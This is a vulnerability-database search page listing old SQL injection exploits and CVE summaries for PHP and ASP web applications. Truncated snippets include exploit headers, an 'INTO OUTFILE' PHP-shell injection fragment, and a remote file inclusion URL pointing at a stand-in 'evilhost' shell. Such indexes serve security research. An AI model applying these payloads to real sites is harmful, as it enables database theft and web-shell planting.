3915 matches found
PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================= PHP-Fusion 6.00.3 rating Parameter Remote SQL Injection Exploit ================================================================= !/usr/bin/perl Exploit for PHP-Fusion 6.00....
CVE-2005-4155
registration.PHP in ATutor 1.5.1 pl2 allows remote attackers to execute arbitrary SQL commands via an e-mail address that ends in a NULL character, which bypasses the PHP regular expression check. NOTE: it is possible that this is actually a bug in PHP code, in which case this should not be treat...
n13SQL.php.txt
.::KingOfSka N-13 News Remote PHP Shell Injection::. || http://contropotere.altervista.org || .::KingOfSka N-13 News PHP Shell Injection::. || Contro Potere Hacking Crew || ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; $sql = urlencode$sql; $expurl= $url."?id=".$sql ; echo ' Click Here to Exploit '; ech...
N-13 News Remote SQL/PHP Shell injection
?php 0 day -- 29/11/2005 N-13 News Remote SQL / PHP-Shell Injection Just upload in a web-server with modphp and run it trhough your browser ; Affected Software : http://network-13.com/ N-13 News Version: All Exploit discovere and written by: KingOfSka @ http://contropotere.altervista.org Conditio...
PT-2005-4664 · Randshop · Randshop
Name of the Vulnerable Software and Affected Versions: Randshop affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved via the kategorieid and katid parameters in the themes/kategorie/index.php file. Recommendations: At t...
Cyphor 0.19 (show.php id) Remote SQL Injection Exploit
No description provided by source. !/bin/env perl //----------------------------------------------------------- // Cyphor Forum SQL Injection Exploit .. By HACKERS PAL // Greets For Devil-00 - Abducter - Almaster // http://WwW.SoQoR.NeT //----------------------------------------------------------...
Cyphor 0.19 (show.php id) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================== Cyphor 0.19 show.php id Remote SQL Injection Exploit ====================================================== !/bin/env perl //-----------------------------------------------------------...
Arki-DB 1.0 - 'catid' SQL Injection
ArkiDB SQL Injection's ArkiDB catid Ramote SQL Injection's ---------------------- Bug By Devil-00 [email protected] Whe Ar All Love Security4Arab For Ever S4a.cc ------------------------------------------------- Explorer Exploit By Devil-00 ------------------------------------------------- Greetz :...
SMB Registry : SQL7 Patches
The remote SQL server seems to be vulnerable to the SQL abuse vulnerability described in technet article Q256052. This problem allows an attacker who has to ability to execute SQL queries on this host to gain elevated privileges. OpenVAS Vulnerability Test $Id: smbmssql7.nasl 6056 2017-05-02...
VuBB Forum RC1 (m) Remote SQL Injection Exploit
No description provided by source. !/bin/env perl ------------------------------------------------------------ - VuBB RC1 SQL Injection .. By Devil-00 [email protected] - ! ==|| This Exploit Only When magicquotesgpc Is OFF ||== - Gr33tz :- - Abducter .. - Devil-00 .. SQL Injection F0und3r & Expl0ti...
e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit
Exploit for linux platform in category remote exploits =========================================================== e107 = 0.6172 resetcore.php Remote SQL Injection Exploit =========================================================== ?php 0.27 18/10/2005 ---e017xpl.php e107 0.617 resetcore.php SQL...
CVE-2005-3076
Simplog 0.9.1 might allow remote attackers to execute arbitrary SQL commands or trigger SQL error messages via invalid 1 pid, 2 blogid, 3 cid, or 4 m parameters to archive.php, or the 5 blogid parameter to blogadmin.php...
Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit (2)
Exploit for unknown platform in category web applications ================================================================= Claroline e-Learning \n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercisesdetails.php\n"; exit; if @ARGV 3 Usage; if @ARGV == 3 $host = @ARGV0; $path...
CVE-2005-1570
forum.asp in bttlxeForum 2.0 allows remote attackers to obtain full path information via a certain hex-encoded argument to the page parameter, possibly due to a SQL injection vulnerability...
PT-2005-2552 · Asp · Asp Virtual News Manager
Name of the Vulnerable Software and Affected Versions: ASP Virtual News Manager affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL commands via the password parameter in the admin login.asp file. This can be exploited by sending malicious input...
ZPanel <= 2.5 Remote SQL Injection Exploit
No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...
ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================== ZPanel = 2.5 Remote SQL Injection Exploit ========================================== Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10,...
[Full-Disclosure] Kernelpanik Labs Digest 2005-2
Hi, This is a email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org. paNews 2.0.4b ------------- Remote SQL injection and command execution. Spanish: http://www.kernelpanik.org/docs/kernelpanik/panews.txt cuteNews 1.3.6 -------------- Remote XSS and...
CVE-2004-1515
SQL injection vulnerability in 1 ttlast.php and 2 last10.php in vBulletin 3.0.x allows remote attackers to execute arbitrary SQL statements via the fsel parameter, as demonstrated using last.php...
CVE-2004-2062
SQL injection vulnerability in antiboard.php in AntiBoard 0.7.2 and earlier allows remote attackers to execute arbitrary SQL via the 1 threadid, 2 parentid, or 3 mode parameters...